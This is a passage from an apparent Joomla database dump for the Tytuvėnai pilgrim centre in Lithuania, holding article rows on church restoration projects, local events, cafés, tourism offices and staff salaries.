width=166}stories/apiecentra/galerija/kalvaitis{/gallery}</span></p>\r\n<p> </p>\r\n<p><strong>Galerija</strong>{gallery cols=5 orientation=horizontal width=166}stories/apiecentra/galerija/Galerija{/gallery}</p>','',1,0,0,31,'2014-07-22 12:14:54',135,'','2022-05-31 21:06:11',135,0,'0000-00-00 00:00:00','2014-07-22 12:14:54','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',39,0,8,'','',1,10399,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(210,298,' I etapas. Bažnyčios restauravimas','i-etapas-baznycios-restauravimas','','<p style=\"text-align: center;\"><img src=\"images/stories/projektai/bpd.png\" border=\"0\" /></p>\r\n<p class=\"MsoNormal\" style=\"text-align: center;\"><strong>TYTUVĖNŲ GYVENTOJUS IR ATVYKSTANČIUS TURISTUS PASITINKA NAUJAS  </strong></p>\r\n<p class=\"MsoNormal\" style=\"text-align: center;\"><strong>ČERPINIS BAŽNYČIOS STOGAS  IR AUKSU PASIPUOŠĘ  BOKŠTAI</strong></p>\r\n<p class=\"MsoNormal\" style=\"text-align: justify;\">Gavus Europos Sąjungos struktūrinių fondų finansavimą 2013 m. liepos mėnesį pradėtas  įgyvendinti projektas ,, Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, I etapas‘‘ (toliau - Projektas). Projekto metu atlikti  bažnyčios pagrindinio stogo, šoninių navų stogų tvarkybos darbai, sumontuotos lietaus nuvedimo sistemos, įrengta žaibosauga, padengti nauja vario skarda bažnyčios bokštai, atrestauruoti   kryžiai. Viešąjai įstaigai ,,Lietuvos verslo paramos agentūra‘‘ ir Lietuvos Respublikos  Ūkio ministerijai sutikus, dalis Projekto sutaupytų lėšų buvo panaudota  papildomiems darbams įsigyti, įrengtos priešgaisrinė ir apsauginė signalizacijos.</p>\r\n<p class=\"MsoNormal\" style=\"text-align: justify;\">Projekto vykdytojo VšĮ ,,Tytuvėnų piligrimų centras‘‘ teigimu,  Tytuvėnų bažnyčia tapo daug patrauklesnė lankytojams, pritraukiama vis daugiau turistų, užtikrintas objekto saugumas. ES struktūrinių fondų  parama tai didžiulis postūmis pirmyn, jos dėka prisidėta prie unikalaus sakralinio objekto išsaugojimo.</p>\r\n<p class=\"MsoNormal\" style=\"text-align: justify;\"><strong>Bendra  Projektui skirta ES  struktūrinių fondų finansavimo suma 1.989.992,00 Lt</strong> (suteiktas finansavimas yra Europos regioninės plėtros fondo lėšos ir Lietuvos Respublikos valstybės biudžeto lėšos), <strong>pareiškėjo lėšos 309.514,00 Lt</strong>.</p>\r\n<p>Projekto veiklų įgyvendinimo trukmė nuo 2012 lapkričio 14 d. iki 2014 m. rugsėjo 30 d.<br /><br /></p>\r\n<p style=\"text-align: center;\"><img src=\"images/stories/projektai/3.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/2.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/1.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/4.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/5.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/6.jpg\" border=\"0\" /> <br /> <img src=\"images/stories/projektai/20140925/1.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/20140925/2.jpg\" border=\"0\" /> <br /> <img src=\"images/stories/projektai/20140925/3.jpg\" border=\"0\" /><br /> <img src=\"images/stories/projektai/20140925/4.jpg\" border=\"0\" /></p>','',1,0,0,57,'2014-09-25 04:24:24',135,'','2014-09-25 04:47:45',135,0,'0000-00-00 00:00:00','2014-09-25 04:24:24','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,4,'','',1,8054,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(211,299,' II etapas. Bažnyčios restauravimas','ii-etapas-baznycios-restauravimas','','<p style=\"text-align: center;\"><img src=\"images/stories/projektai/bpd.png\" border=\"0\" /></p>\r\n<p class=\"MsoNormal\">VšĮ ,,Tytuvėnų piligrimų centras‘‘ pagal 2007-2013 m. Sanglaudos skatinimo veiksmų programos 1 prioriteto ,,Vietinė ir urbanistinė plėtra, kultūros paveldo išsaugojimas bei pritaikymas turizmo plėtrai VP3-1.3-ŪM-02-V priemonę ,,Viešųjų nekilnojamųjų kultūros paveldo objektų kompleksiškas pritaikymas turizmo reikmėms‘‘, įgyvendina <strong>projektą ,, Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, II etapas‘‘.</strong></p>\r\n<p class=\"MsoNormal\"><strong>Projekto vykdytojas - </strong>VšĮ ,,Tytuvėnų piligrimų centras‘‘.</p>\r\n<p class=\"MsoNormal\"><strong>Projekto tikslas -</strong> atkurti ir restauruoti Tytuvėnų Švč. Mergelės Marijos bažnyčią, kompleksiškai pritaikyti objektą kultūrinio turizmo reikmėms. Antras Projekto etapas- atliekami bažnyčios fasadų tvarkybos darbai, leidžiantys užtikrinti tinkamą viešąjį kultūros paveldo objekto lankymą.</p>\r\n<p class=\"MsoNormal\"><strong>Bendra projekto vertė:</strong> 2 937 316, 00 Lt.</p>\r\n<p class=\"MsoNormal\"><strong>Projekto finansavimo šaltiniai:</strong> ES struktūrinių fondų finansavimas 2 937 316,00 Lt.</p>\r\n<p class=\"MsoNormal\"><strong>Projekto veiklų įgyvendinimo pradžia</strong> yra 2013 m. lapkričio 2 d.</p>\r\n<p><strong>Projekto veiklų įgyvendinimo pabaiga</strong> yra 2015 m. vasario 28 d.</p>','',1,0,0,57,'2014-09-25 04:24:41',135,'','2014-09-25 04:49:22',135,0,'0000-00-00 00:00:00','2014-09-25 04:24:41','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,3,'','',1,6875,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(212,300,'Turizmo dienos renginiai Kelmės rajone','turizmo-dienos-renginiai-kelmes-rajone','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės rajono savivaldybė, Kelmės krašto muziejus, Tytuvėnų piligrimų centras, Tytuvėnų regioninis parkas ir Kražių kultūros centras kviečia visus kelmiškius ir rajono svečius paminėti Tarptautinę turizmo dieną ir apsilankyti žymiausiuose krašto lankytinuose objektuose rugsėjo 26 d.</span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/tdiena2014/t1.jpg\" border=\"0\" /><br /><img src=\"images/stories/naujienos/tdiena2014/t2.jpg\" border=\"0\" /></span></p>',1,0,0,44,'2014-09-25 05:29:41',135,'','2014-09-25 05:29:54',135,135,'2014-09-25 05:29:54','2014-09-25 05:29:41','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tdiena2014\\/turizmas2014.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,159,'','',1,3752,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(213,301,'Nemokamas koncertas \"DĖKINGUMAS\"','nemokamas-koncertas-dekingumas','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m. spalio 4 d. 15 val. </span></p>\r\n<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bažnyčios ir vienuolyno ansamblio 400 m. jubiliejaus baigiamasis koncertas \"DĖKINGUMAS\".</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> Koncertas nemokamas. </span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/dekingumas2014/koncertasok.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-09-28 09:36:57',135,'','2014-09-28 09:38:04',135,0,'0000-00-00 00:00:00','2014-09-28 09:36:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dekingumas2014\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,158,'','',1,3759,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(174,258,'Maitinimo įstaigos','maitinimo-staigos','','<p><strong><span style=\"font-size: large;\">Tytuvėnų piligrimų centras (pagal užsakymus)</span></strong></p>\r\n<p><span style=\"font-size: small;\"><span style=\"font-size: medium;\">Maironio g. 2a, Tytuvėnai</span><br /><span style=\"font-size: medium;\">Mob. tel. 8 675 58506</span><br /><span style=\"font-size: medium;\">El. paštas info@infotytuvenai.lt</span><br /><span style=\"font-size: medium;\">Interneto svetainė info@infotytuvenai.lt</span><br /></span></p>\r\n<p><span style=\"font-size: large;\"><strong><br />Kelmė</strong></span></p>\r\n<p><strong>Kavinė „Kelmynė“</strong><br />Dariaus ir Girėno g. 13, Kelmė<br />Mob. 8 652 875 69<br />El. paštas info@kelmyne.lt<br />Interneto svetainė <a href=\"http://www.kelmyne.lt%20\">www.kelmyne.lt </a><br /><br /><strong>Kavinė „Agrotech“</strong><br />V. Putvinskio g. 12, Kelmė<br />Tel. 8 427 61 094<br /><br /><strong>Restoranas „Vilbėnas“</strong><br />Vytauto Didžiojo g. 51, Kelmė<br />Tel. 8 427 51 565<br /><br /><strong>Kavinė „Audit“</strong><br />Vytauto Didžiojo g. 64, Kelmė<br />Mob. 8 615 35 717</p>\r\n<p><strong>Kavinė „Svetainė“</strong><br />Vytauto Didžiojo g. 72, Kelmė<br />Mob. 8 648 79679<br /><br /></p>\r\n<h2><span style=\"font-size: large;\"><strong>Kelmės apylinkės</strong></span></h2>\r\n<p><strong>Kavinė „Abromika“</strong><br />Kuršukų k., Kelmės r.<br />Tel. 8 427 61 269<br /><br /></p>\r\n<h2><span style=\"font-size: large;\"><strong>Tytuvėnai</strong></span></h2>\r\n<p><strong>Restoranas „Sedula“</strong><br />Skogalio k., Tytuvėnai, Kelmės r.<br />Tel. 8 682 46498<br />El. paštas <a href=\"mailto:vadybininkas.sedula@gmail.com\">vadybininkas.sedula@gmail.com</a><br />Interneto svetainė <a href=\"http://www.sedula.lt\">www.sedula.lt</a><br /><br /><strong>Kavinė „Žara“</strong><br />Maironio g. 2B, Tytuvėnai, Kelmės r.<br />Tel. 8 427 56 231</p>\r\n<p><strong>Nijolės Astrauskienės įmonė</strong><br />Pievų g. 38, Tytuvėnai, Kelmės r.<br />Tel. <span>8 606 14689<br /><br /></span></p>\r\n<h2><strong><span style=\"font-size: large;\">Tytuvėnų apylinkės</span></strong></h2>\r\n<p><strong>Kavinė „Nijolė“</strong><br />Pavydų k., Tytuvėnų apyl. sen., Kelmės r.<br />Tel. 8 427 41 606</p>\r\n<h2><strong><span style=\"font-size: large;\"><br />Kražiai</span></strong></h2>\r\n<p><strong>Kavinė</strong><br />Vytauto g. 30, Kražiai<br />Tel.: 8 629 917997 </p>\r\n<p><strong> </strong></p>','',1,0,0,52,'2013-05-28 11:18:19',135,'','2018-06-13 06:44:23',135,0,'0000-00-00 00:00:00','2013-05-28 11:18:19','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',20,0,13,'','',1,20695,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(175,259,'Turizmo informacija','turizmo-informacija','','<p style=\"text-align: left;\"><img src=\"http://www.tytuvenai.eu/images/stories/turizmas/ili1eo1318.jpg\" border=\"0\" alt=\"\" /><br /><strong>Turizmo informaciją Kelmės rajone teikia:</strong><br /><br /><strong>Kelmė:</strong><br /><br />VšĮ Kelmės turizmo ir verslo informacijos centras, Birutės g. 4, LT-86163 Kelmė, tel. (8 427) 61 430, el. p. direktore@kelmevic.lt, interneto svetainė <a href=\"https://www.infokelme.lt/\">https://www.infokelme.lt/</a>.<br /><br /><strong>Tytuvėnai:</strong><br /><br />VšĮ „Tytuvėnų piligrimų centras“, Maironio g. 2a, Tytuvėnai, Kelmės r., tel. (8 427) 56223, el. p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a>, interneto svetainė <a href=\"undefined/\">www.infotytuvenai.</a>lt.<br /><br />Tytuvėnų regioninio parko lankytojų centras,  Miško g. 3, Tytuvėnai, Kelmės r.  Tel./faks. (8 427) 59 031,  el. p. tytuvenurp@trp.lt,  internetinė svetainė <a href=\"http://www.trp.lt\">www.trp.lt</a><br /><br /><strong>Kražiai:</strong><br /><br />Kražių M. K. Sarbievijaus kultūros centras, Kolegijos g. 5, Kražiai, LT-86282 Kelmės r., el. p. kraziai.turizmas@kraziai.lt, interneto svetainė <a href=\"http://www.kraziai.lt\">www.kraziai.lt</a>.</p>\r\n<p style=\"text-align: left;\"> </p>\r\n<p style=\"text-align: left;\"> </p>\r\n<p>Keliautojams pristatome unikalų maršrutą „Žiedinis maršrutas: Kelmės rajono paveldas nuo Tytuvėnų iki Kražių“ kviečiantį pažinti Kelmės rajono nekilnojamąjį ir gamtos paveldą. Maršrutas pateikiamas inovatyviai, šiuolaikiškai.</p>\r\n<p>Maršrutas pateiktas žiedo principu, todėl keliautojas galės pats pasirinkti nuo kurio taško pradėti pažintį su Kelmės rajono nekilnojamu ir gamtos paveldu. Iš viso nukeliausite virš 139 km ir sugaišite dvi dienas.</p>\r\n<p>Mobilią programėlę-aplikaciją galite rasti </p>\r\n<p><a href=\"https://play.google.com/store/apps/details?id=com.freshgun.kelme\" target=\"_blank\"><img src=\"https://www.infokelme.lt/data/ckfinder/files/android.jpg\" border=\"0\" alt=\"\" width=\"232\" height=\"91\" /></a>Kelmės kraštas  <a href=\"https://apps.apple.com/ca/app/kelm%C4%97s-kra%C5%A1to-paveldas/id1534841939\" target=\"_blank\"><img src=\"https://www.infokelme.lt/data/ckfinder/files/app%20store.jpg\" border=\"0\" alt=\"\" width=\"210\" height=\"90\" /></a>  Kelmės krašto paveldas</p>\r\n<p>                                   </p>\r\n<p>Inovatyvų, šiuolaikišką maršruto pristatymą finansavo</p>\r\n<p><span>Kultūros paveldo departamentas prie Kultūros ministerijos</span></p>','',1,0,0,52,'2014-04-08 12:15:41',135,'','2023-11-27 19:56:47',135,0,'0000-00-00 00:00:00','2014-04-08 12:15:41','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,10,'','',1,20682,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(176,260,'Įstatai','statai','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/istatai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/istatai.pdf\" target=\"_blank\">VšĮ Tytuvėnų piligrimų centro įstatai</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,53,'2013-03-06 19:49:35',135,'','2016-03-03 12:03:48',135,0,'0000-00-00 00:00:00','2013-03-06 19:49:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,6,'','',1,9264,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(177,261,'Darbo užmokestis','darbo-umokestis','','<p><em> </em></p>\r\n<table style=\"width: 100%;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em><strong>Eil. Nr.</strong></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em><strong>Pareigybės pavadinimas</strong></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em><strong>Etatų skaičius</strong></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em><strong>Vidutinis mėnesinis bruto darbo užmokestis </strong></em></p>\r\n<p align=\"center\"><em><strong> </strong></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em><strong>Vidutinis mėnesinis bruto darbo užmokestis 2018 m. II ketvirtis</strong></em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>1.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Direktorius</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>2.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Ūkio dalies vedėjas</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>3.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Administratorius</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>4.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Gidas-vadybininkas</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em>*</em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>5.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Vyr. finansininkas</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em>Paslaugą teikia įmonė</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em><em>Paslaugą teikia 